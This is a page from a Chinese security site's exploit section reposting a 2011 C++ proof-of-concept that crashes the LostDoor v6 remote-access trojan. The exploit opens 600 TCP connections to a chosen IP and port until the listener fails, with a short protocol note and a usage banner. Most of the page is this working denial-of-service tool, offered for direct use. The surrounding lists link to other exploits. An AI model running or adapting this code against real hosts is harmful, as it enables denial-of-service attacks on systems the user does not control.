首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LostDoor v6 Remote Denial Of Service
来源:kevin.nullbyte@gmail.com 作者:Kevin 发布时间:2011-05-30  
/*  LostDoor v6 Remote Denial Of Service
*  Author: Kevin R.V <kevin.nullbyte@gmail.com>
*    Date: 2011
* License: Totally free 8-)
*
*
* Some information:
*
*
* The protocol used by LastDoor v6 is a simply clear text protocol with a delimitter, thats a normal packet to connect
* v1ct1m[\AS/]My Host[\AS/] Windows XP Professional[\AS/]testing-a6ae13b[\AS/]2:30:36[\AS/]Spain[\AS/][\AS/]511,48
* The application split by [\AS/] to get the different paramaters sended by victim
* That exploit code simply try to connect 600 TCP sockets, and the trojan get closed by showing an Automated error message because a programming error.
*
* The exploit have 2 random effects:
* 1 - computer get freezed, and application get closed automatically in some seconds
* 2 - Automated error message and application get close in some seconds
* */

#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;


int PoC(char * host, unsigned int port)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock[600];
    struct sockaddr_in  local[600];
    for(int i = 0; i<600; i++)
    {
sock[i]=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local[i].sin_family = AF_INET;
local[i].sin_addr.s_addr = inet_addr(host);
local[i].sin_port = htons(port);
if (connect(sock[i], (struct sockaddr *)&local[i], sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
}
else
{
if ( connected )
{
cout << endl << endl << "[+] Congrats LostDoor crashed!" << endl;
break;
}
else
cout << endl << endl << "[-] Sorry not LostDoor detected :(" << endl;
}
}
}
int main(int argc, char *argv[])

{
cout << "LostDoor v6 Denial Of Service " VERS << endl << endl;
cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
if ( argc < 2 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
exit(-1);
}

u_short port;
char * ip;

for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
}

cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port);


return 1;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·51 bytes FreeBSD/x86 encrypted
·Bitweaver 2.x (FCKeditor) File
·FreeBSD/x86 - Execve ('/bin/sh
·WysGui <= 2.3 (FCKeditor) File
·Poison Ivy 2.3.2 (Latest versi
·Trojan Nova Lite v2.6 Access V
·HP Data Protector Client EXEC_
·LilHTTP Source Code Disclosure
·HP Data Protector Client EXEC_
·Magix Musik Maker 16 .mmm Stac
·Magneto ICMP ActiveX v4.0.0.20
·Easy Media Script SQL Injectio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved